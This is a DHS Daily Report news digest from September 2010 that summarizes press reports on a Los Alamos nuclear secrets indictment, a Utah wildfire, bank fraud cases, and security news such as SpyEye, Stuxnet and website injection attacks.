Tuesday, September 21, 2010

Complete DHS Daily Report for September 21, 2010

Daily Report

Top Stories

 According to the U.S. Department of Justice, a scientist and his wife, who both previously worked as contractors at the Los Alamos National Laboratory in New Mexico, have been indicted on charges of communicating classified nuclear weapons data to a person they believed to be a Venezuelan government official, and conspiring to participate in the development of an atomic weapon for Venezuela. (See item 12)

12. September 17, U.S. Department of Justice – (New Mexico) Former workers at Los Alamos charged with transmitting classified nuclear weapons data. The Justice Department (DOJ) September 17 announced that a scientist and his wife, who both previously worked as contractors at the Los Alamos National Laboratory (LANL) in New Mexico, have been indicted on charges of communicating classified nuclear weapons data to a person they believed to be a Venezuelan government official, and conspiring to participate in the development of an atomic weapon for Venezuela, among other violations. Both defendants were arrested by FBI agents September 17. If convicted of all the charges in the indictment, the defendants face a potential sentence of life in prison. The indictment does not allege that the government of Venezuela or anyone acting on its behalf sought or was passed any classified information, nor does it charge any Venezuelan government officials or anyone acting on their behalf with wrongdoing. Further, the indictment does not charge any individuals currently working at LANL with wrongdoing. According to the indictment, one of the defendants had a series of conversations in March 2008 with an undercover FBI agent posing as a Venezuelan government official. During these conversations, he discussed his program for developing nuclear weapons for Venezuela. Among other things, the suspect allegedly said he could help Venezuela develop a nuclear bomb within 10 years and that, under his program, Venezuela would use a secret, underground nuclear reactor to produce and enrich plutonium, and an open, above-ground reactor to produce nuclear energy. Source: http://www.justice.gov/opa/pr/2010/September/10-nsd-1044.html

 National Public Radio reports that cooler temperatures and calmer and shifting winds have diminished the wildfire threat to 1,600 homes in Herriman, Utah. Several neighborhoods were evacuated September 19 after a wildfire erupted shortly after noon near a machine-gun training range at Camp Williams, a vast military reservation used by the Army National Guard located about 30 miles south of Salt Lake City. (See item 38)

38. September 20, National Public Radio – (Utah) Threat eases from ‘Machine Gun’ wildfire in Utah. Cooler temperatures and calmer and shifting winds have diminished the wildfire threat to 1,600 homes in Herriman, Utah. But fire and police officials continued to keep about 5,000 people out of their homes. Several neighborhoods were evacuated September 19 after a wildfire erupted shortly after noon near a machine-gun training range at Camp Williams, a vast military reservation used by the Army National Guard located about 30 miles south of Salt Lake City. The “Machine Gun” fire was sparked by a stray bullet that likely ricocheted off a rock and into dry brush, said the National Guard commander in Utah. Military firefighters attacked the relatively small blaze and believed it was out, he said. But the region was under a National Weather Service “Red Flag” warning for hot and dry conditions conducive to wildfire and when wind gusts picked up 3 hours later, the blaze flared up from 300 to 3,500 acres, and raced out of control. “It’s the biggest [fire] I’ve seen here,” the National Guard commander said. Training has triggered wildfires in the past, and the National Guard has protocols for conducting training when wildfire is possible. State and county officials promised an investigation. More than 120 National Guard soldiers were activated to assist police and firefighters. Source: http://minnesota.publicradio.org/features/npr.php?id=129986485


Banking and Finance Sector

14. September 20, LoanSafe.org – (New Jersey) Former Chase employee charged in $1.8 Million bank fraud scheme. An indictment was unsealed September 20 against a suspect accused of charging a multi-year bank fraud scheme that netted him over $1.8 million between the summer of 2005 and the summer of 2009, an U.S. attorney announced. The suspect was also charged with engaging in transactions over $10,000 with the proceeds of the fraud. The 22-count indictment charges that the suspect, while an employee of JPMorgan Chase Services, manipulated the firm’s internal books and records and caused the bank to wire transfer to his account, to accounts of his family, and to accounts in which his life partner had right, title, interest or control. The indictment claims that among the wire transfers of funds was one in 2005 for over $499,500, one in 2008 for $583,444.99, and one in 2009 for another $583,444.99. If convicted, he faces a statutory maximum possible sentence of 240 years in prison, a fine of $6.25 million, $2,200 in special assessments, and up to 5 years’ supervised release. Source: http://www.loansafe.org/former-chase-employee-charged-in-1-8-million-bank-fraud-scheme

15. September 19, WLS 7 Chicago – (Illinois) Hundreds fall victim to ID theft scam. More victims have come forward regarding a case of debit card fraud in Wheeling, Illinois. Hundreds of people lost thousands of dollars, and Chicago police were offering up tips to help protect against scam artists. The story is the same in all the cases: residents used their debit cards at a local business and then noticed large ATM withdrawals from their bank accounts. Consumers in Wheeling and Buffalo Grove were targeted. Police said they are not sure who is responsible for the illegal activity but said all the victims used their debit cards at a local business. Batavia-based national grocery store chain Aldi issued a statement September 17 acknowledging they were recently notified that the security of a limited number of debit card terminals at some stores may have been compromised, and they have removed terminals that may have been affected. The FBI is investigating. Source: http://abclocal.go.com/wls/story?section=news/local&id=7676756

16. September 18, Bank Info Security – (National) 6 Banks closed on Sept. 17. Federal and state banking regulators closed six banks September 17. These failures raise the total number of failed institutions to 140 so far in 2010. ISN Bank, Cherry Hill, New Jersey, was closed by the New Jersey Department of Banking and Insurance, which appointed the Federal Deposit Insurance Corp. (FDIC) as receiver. The FDIC entered into a purchase and assumption agreement with New Century Bank (d.b.a., Customers Bank), Phoenixville, Pennsylvania, to assume all ISN deposits. The cost to the Depositors Insurance Fund (DIF) is estimated to be $23.9 million. The Bank of Ellijay, Ellijay, First Commerce Community Bank, Douglasville, and The Peoples Bank, Winder, were closed by the Georgia Department of Banking and Finance, which appointed FDIC as receiver. Community & Southern Bank, Carrollton, Georgia, acquired the banking operations of all three banks, including all deposits. The FDIC estimates the cost to DIF for Bank of Ellijay will be $55.2 million; for First Commerce Community Bank, $71.4 million; and for The Peoples Bank, $98.9 million. Bramble Savings Bank, Milford, Ohio, was closed by the Ohio Division of Financial Institutions, which appointed the FDIC as receiver. The FDIC entered into a purchase and assumption agreement with Foundation Bank, Cincinnati, to assume all deposits. The cost to DIF is estimated to be $14.6 million. Maritime Savings Bank, West Allis, Wisconsin, was closed by Office of Thrift Supervision, which appointed FDIC as receiver. The FDIC entered into a purchase and assumption agreement with North Shore Bank, FSB, Brookfield, Wisconsin, to assume all Maritime deposits. The cost to the DIF is estimated to be $83.6 million. Source: http://www.bankinfosecurity.com/articles.php?art_id=2932

17. September 18, San Francisco Appeal – (California) Man sentenced in $1.3 million bank fraud scam. One man was sentenced to prison September 15 for participating in a scheme with three others that defrauded banks of more than $1.3 million, according to the U.S. Justice Department. The 46-year-old, was ordered to serve 45 months in prison for depositing fraudulent checks from a credit line into bank accounts and then rapidly withdrawing the money from ATMs, a U.S. attorney said in a statement. All four defendants made plea agreements admitting to depositing the phony checks, making withdrawals, and then making purchases before the checks were returned unpaid. The statement said bank accounts became overdrawn by thousands of dollars, and sometimes tens of thousands of dollars. Source: http://sfappeal.com/news/2010/09/man-sentenced-in-13-million-bank-fraud-scam.php

18. September 17, Associated Press – (California) San Francisco man charged in $25M Ponzi scheme. Federal prosecutors said a San Francisco man has been charged with defrauding investors of $25 million in a residential property Ponzi scheme. A U.S. attorney said the 31-year-old suspect allegedly persuaded at least 80 people to lend him money by promising high returns on their investments in properties he would purchase, renovate and resell. FBI investigators allege that instead, early investors were reimbursed with funds from later lenders, while the suspect used some of the proceeds for personal expenses and to invest in retail businesses. The suspect pleaded not guilty during his first court appearance September 17. Source: http://www.sfgate.com/cgi-bin/article.cgi?f=/n/a/2010/09/17/state/n154425D39.DTL

19. September 17, Krebs on Security – (International) SpyEye botnet’s bogus billing feature. Miscreants who control large groupings of hacked PCs or “botnets” are always looking for ways to better monetize their crime machines, and competition among rival bot developers is leading to devious innovations. The SpyEye botnet kit, for example, now not only allows botnet owners to automate the extraction of credit card and other financial data from infected systems, but it also can be configured to use those credentials to generate bogus sales at online stores set up by the botmaster. SpyEye is a software package that promises to make running a botnet a point-and-click exercise. A unique component of SpyEye is a feature called “billinghammer,” which automates the purchase of worthless or copycat software using credit card data stolen from victims of the botnet. The SpyEye author explained this feature in detail on several hacking forums where his kit is sold, even including a video that walks customers through the process of setting it up. Basically, the scam works like this: The botmaster acquires some freeware utility or legitimate program, renames it, claims it as his own and places it up for sale at one of several pre-selected software sales and distribution platforms, including ClickBank, FastSpring, eSellerate, SetSystems, or Shareit. The botmaster then logs in to his SpyEye control panel, feeds it a list of credit card numbers and corresponding cardholder data, after which SpyEye opens an Internet Explorer Window and — at user-defined intervals — and starts auto-filling the proper fields at the botmaster’s online store and making purchases. Source: http://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/

20. September 17, KWTX 10 Waco – (Texas) FBI seeks public’s help in finding I-35 bandit. The FBI asked for the public’s help September 17 in locating the man dubbed the I-35 Bandit who’s robbed 15 Texas banks between Wichita Falls and San Antonio since January 2004. The most recent robbery occurred September 8 at the First State Bank Central Texas in Little River Academy during the height of flooding in the area caused by heavy rainfall from Tropical Storm Hermine. The robber used a small sedan as a getaway vehicle in all 15 of the robberies, and when he held up the bank in Little River, he was driving a 2011 model Hyundai Sonata that may have been a rental, the FBI said. It appears he has lost weight over the last 2 years, authorities said. The I-35 Bandit should be considered “armed and extremely dangerous,” the FBI said, because in each robbery he entered the bank with his handgun drawn and pointed it directly at tellers or customers. Source: http://www.kwtx.com/news/headlines/103163624.html?ref=624

21. September 17, U.S. Securities and Exchange Commission – (National) Lambros D. Ballas sanctioned. A suspect, of Huntington, New York, was barred from association with any broker or dealer by the U.S. Securities and Exchange Commission (SEC). The sanction was ordered in an administrative proceeding before an administrative law judge, following a court-ordered injunction against him. In July 2010, the suspect was enjoined from violating the antifraud provisions of the federal securities laws based on his involvement in a fraudulent scheme to manipulate stock prices of multiple publicly traded companies. He arranged for the distribution of phony press releases involving major public companies, such as Google, Microsoft, and Walt Disney, and then posed as an investor on Yahoo! Inc. Internet message boards providing links to the bogus releases he had created and disseminated. In the case of one company he touted, the suspect bought 5,000 shares of its stock before issuing a phony press release that caused the stock price to increase nearly 80 percent within a few hours of the fake release. During the time in which he engaged in this conduct, the suspect was a registered representative with a broker-dealer registered with the Commission. Source: http://www.sec.gov/news/digest/2010/dig091710.htm

22. September 16, Wired.com – (California) Man gets 6 years in prison for laundering $2.5 million for carders. A California man who helped funnel stolen cash to a global network of hackers and carders was sentenced September 16 to 6 years in prison for conspiracy to launder money.รข_¨ The 38-year-old suspect, also known as “uBuyWeRush,” ran a legitimate business selling liquidation and overstock merchandise online and from three California stores. But, according to an indictment, he also sold MSR-206’s to carders to encode stolen bank card data onto blank cards, and he served as a conduit to transmit stolen money between mules and carders. He worked with many of the top carders in the criminal underground between 2003 and 2006, including a Ukrainian carder who allegedly worked with the TJX hacker and was considered by authorities to be one of the top sellers of stolen card data on the Internet. In 2003 and 2004, the suspect became an approved and trusted vendor on online criminal forums such as CarderPlanet and Shadowcrew, advertising his goods and services and dispensing advice on the best tools to use for various criminal endeavors. Source: http://www.wired.com/threatlevel/2010/09/ubuywerush/

Information Technology

44. September 20, Computerworld – (International) Adobe moves up Flash fix, will patch bug today. Adobe has accelerated the delivery of a patch for a critical vulnerability in Flash and will ship the fix September 20, rather than next week as originally scheduled. Chrome users, however, got the patch September 17, one of the benefits of an April Google-Adobe deal. The bug, which Adobe acknowledged September 13, can be used by attackers to commandeer machines running the popular media player. According to the US-CERT (United States Computer Emergency Readiness Team) hackers can exploit the vulnerability by enticing users to a malicious Web site, or by getting them to open rigged PDF or Microsoft Word documents. Adobe last week called the ongoing attacks “targeted” and “limited,” and aimed only at Windows users. Security vendors have also unearthed in-the-wild threats leveraging the Flash bug. Source: http://www.computerworld.com/s/article/9186638/Adobe_moves_up_Flash_fix_will_patch_bug_today

45. September 20, The H Security – (International) Workaround for ASP.NET server’s encryption vulnerability. In a security advisory, Microsoft has confirmed the vulnerability in the process used by ASP.NET applications to encrypt cookies and other session information. In the announcement for the security advisory, Microsoft said it was not, so far, aware of any attacks. However, the security group encouraged users to “review the advisory for mitigations and workarounds.” A blog entry describes how to implement the workarounds and offers a script to help administrators determine whether their ASP.NET applications are vulnerable. The cause of the problem was highlighted last week by two security researchers who established that there was an issue with how the ASP.NET framework encrypted data. Usually, this uses the Advanced Encryption Standard (AES) in Cipher Block Chaining mode (CBC), but this mode is vulnerable to what are called Padding Oracle Attacks PDF which can allow encrypted data, such as cookies, to be decrypted without the key. Source: http://www.h-online.com/security/news/item/Workaround-for-ASP-NET-server-s-encryption-vulnerability-1081837.html

46. September 20, Government Computer News – (International) Apple’s Ping social networking site quickly hit by spammers. Less than 1 week after introducing its new music-oriented social networking site September 1, Apple had to begin scrubbing Ping clean of spammers and scammers who almost immediately began infiltrating the network. Ping was launched as a feature of Apple’s new iTunes 10 music mart. “With Ping, you can follow your favorite artists and friends and join a worldwide conversation with music’s most passionate fans,” Apple’s CEO said in an announcement. He probably was not expecting that within hours, fans also would be swamped with offers for free iPhones, iPads, iPods and other iGoodies from Web site ads, and survey offers in the comments sections of posts on popular artists. “This development does not come as a surprise,” said the vice president of technology strategy at M86 Security. “Ping is a social network and ... cyber criminals have been targeting social networks for quite some time.” The two grand dames of social networking, Twitter and Facebook, have long been spam vectors. But Ping’s online filters were focused more on obscenity and copyright violations than possible spammers. Source: http://gcn.com/articles/2010/09/20/cybereye-box-apple-ping-spammers.aspx

47. September 20, The Register – (International) 4chan launches DDoS against entertainment industry. Members of 4chan launched a series of distributed denial of service attacks (DDoS) against Web sites maintained by the Motion Pictures Association of America and Recording Industry Association of America over the weekend, protesting actions taken against torrent tracker Web site the Pirate Bay. “Operation: Payback Is A [expletive]” began as an attack against Aiplex — an Indian firm that carries out DDoS attacks on Web sites hosting BitTorrent trackers that fail to respond to takedown notices — before progressing onto other entertainment industry Web sites. Packet floods knocked entertainment Web sites offline intermittently throughout the weekend. The attacks were initially coordinated via an Internet Relay Chat channel, which has since been taken offline. Participants in the attacks are invited to download one of two attack tools. It is unclear whether or not participants in the attack are using zombie networks of compromised PCs. Source: http://www.theregister.co.uk/2010/09/20/4chan_ddos_mpaa_riaa/

48. September 18, Softpedia – (International) Sites hosted at Go Daddy hit by mass injection attack again. Researchers from Sucuri Security, a company running a Web integrity monitoring service, warn that a number of Web sites hosted at Go Daddy have had malicious code injected into their pages. All infected sites had base64-encoded JavaScript added to all of their PHP files. The rogue scripting decodes to a element, which loads content from a third-party domain. The external code redirects visitors to a scareware distribution Web site, which mimics an antivirus scan and displays fake warnings about infections on their computers. The goal of the scam is to trick users to buy licenses for a useless application, which claims to be able to clean malware, that wasn’t even there to begin with. The company provides a generic Web site clean-up script, which according to some comments worked for removing this latest infection. However, those amongst the affected Web site owners should check first with Go Daddy, as they might already have a solution for this attack. Source: http://news.softpedia.com/news/Sites-Hosted-at-Go-Daddy-Hit-by-Mass-Injection-Attack-Again-156997.shtml

49. September 17, DarkReading – (International) Forrester pushes ‘zero trust’ model for security. Trust no one, not even end users: That’s the underlying theme of a new security model proposed by Forrester Research called “Zero Trust,” which calls for enterprises to inspect all network traffic, from the outside and on the inside. A senior analyst with Forrester said the current trust model in security is broken and the only way to fix it is to get rid of the idea of the trusted internal network and the untrusted external network. Instead consider all network traffic untrusted, he said. “Times have changed. You can’t think about trusted and untrusted users” anymore, said the analyst, who gave more details on the model at Forrester’s Security Forum in Boston, Massachusetts. The wave of damaging insider-borne breaches during the past few years illustrates the importance of being able to see everything going on in the network, he said. Zero Trust means inspecting all traffic in real time, and a new category of products called network analysis and visibility, which combines several niche tools — such as forensics, packet capture, meta data analysis, and network discovery flow analysis — such that they provide visibility and analysis of traffic and do not disrupt business processes. Source: http://www.darkreading.com/insiderthreat/security/perimeter/showArticle.jhtml?articleID=227500145

50. September 17, The H Security – (International) Stuxnet also found at industrial plants in Germany. Siemens is reporting that industrial plants in Germany have also been hit by the Stuxnet worm. According to a spokesperson for Siemens, about one third of the 15 infections discovered at industrial plants worldwide have been found at sites in the German process industry sector. Siemens’ own plants are said not to be affected. Analyses by Siemens have confirmed that Stuxnet can, in theory, manipulate Programmable Logic Controllers (PLCs). However, the behavior has not been observed in the wild. According to the spokesperson, Stuxnet checks the configurations of infected WinCC or PC7 systems for existing data blocks. If it finds suitable blocks, it becomes active and modifies the controller code. If it doesn’t find any, it remains inactive. The worm seems to look for specific types of systems to manipulate. Siemens couldn’t provide details about which systems are or could be affected. The spokesperson said no system with an active worm has so far been observed. Automation system security specialists Langner Communications have released a more detailed analysis of how Stuxnet manipulates PLCs on its Web site. According to this analysis, the worm injects arbitrary code when transmitting blocks of code to the PLC. To compromise data transmissions, it diverts the data via a wrapper DLL before submitting it to the SIMATIC Device Operating System’s original s7otbxdx.dll library for processing. Source: http://www.h-online.com/security/news/item/Stuxnet-also-found-at-industrial-plants-in-Germany-1081469.html

Communications Sector

51. September 20, Associated Press – (New Mexico) Water main break leads to Internet outage in Alq. A water main break has shut down Internet and phone service in portions of northwest Albuquerque, New Mexico. Qwest said almost 100 Albuquerque homes and businesses will be without service through September 21. The water main break at a Qwest office near 4th Street and Griegos Road is to blame. A Qwest spokesman said service should be fully restored by the morning of September 21 at the latest. Source: http://www.newswest9.com/Global/story.asp?S=13183405

52. September 18, Binghamton Press & Sun-Bulletin – (New York) Vestal crash takes out Time Warner cable, Internet. Thousands of Time Warner cable and Internet customers were without service for most of the day and night September 18 after a car crash downed a utility pole along Vestal Parkway near Binghamton University in Vestal, New York. Two teenagers were unhurt in the accident, which took place at 11:26 a.m. The accident damaged a Time Warner Cable fiber optics line knocking out cable and Internet service to most neighborhoods west of the crash. Outages were reported in Vestal, Endicott, Endwell and the Town of Union. It is not known how many customers were affected and when their cable service would be restored. Customer service lines to Time Warner in Vestal were continuously busy throughout the day September 18. As many as 12 linemen from Time Warner remained on the scene throughout the day trying to repair the severed fiber optics line that supplies cable television and high-speed Internet services to thousands of customers in the Binghamton region. Source: http://www.pressconnects.com/article/20100918/NEWS01/100918002/1112/Vestal-crash-takes-out-Time-Warner-cable--Internet

53. September 17, United Press International – (International) Rogue satellite still ‘talking’. An uncontrollable satellite drifting in orbit did not shut itself down as predicted and is posing signal interference risk to other satellites, experts said. Intelsat’s Galaxy 15 communications satellite, dubbed the “zombie satellite,” lost contact with its controllers in April but is stuck “on” and continues to transmit signals as its operators on Earth work to avoid potential interference with other nearby spacecraft, SPACE.com reported September 17. Intelsat engineers had estimated that the satellite would lose power and shut itself off in late August, but that has not happened. Intelsat officials said there is no risk of it physically colliding with other spacecraft, so their team’s main focus is preventing Galaxy 15’s signals from interfering with neighboring satellites. The 4,171-pound satellite went rogue April 5 when it stopped responding to controllers on the ground but maintained an active payload, with its telecommunications transmitter still functioning. Several attempts to shut down Galaxy 15 have failed, leaving the defunct satellite stuck drifting in space and still “talking.” Source: http://www.spacemart.com/reports/Rogue_satellite_still_talking_999.html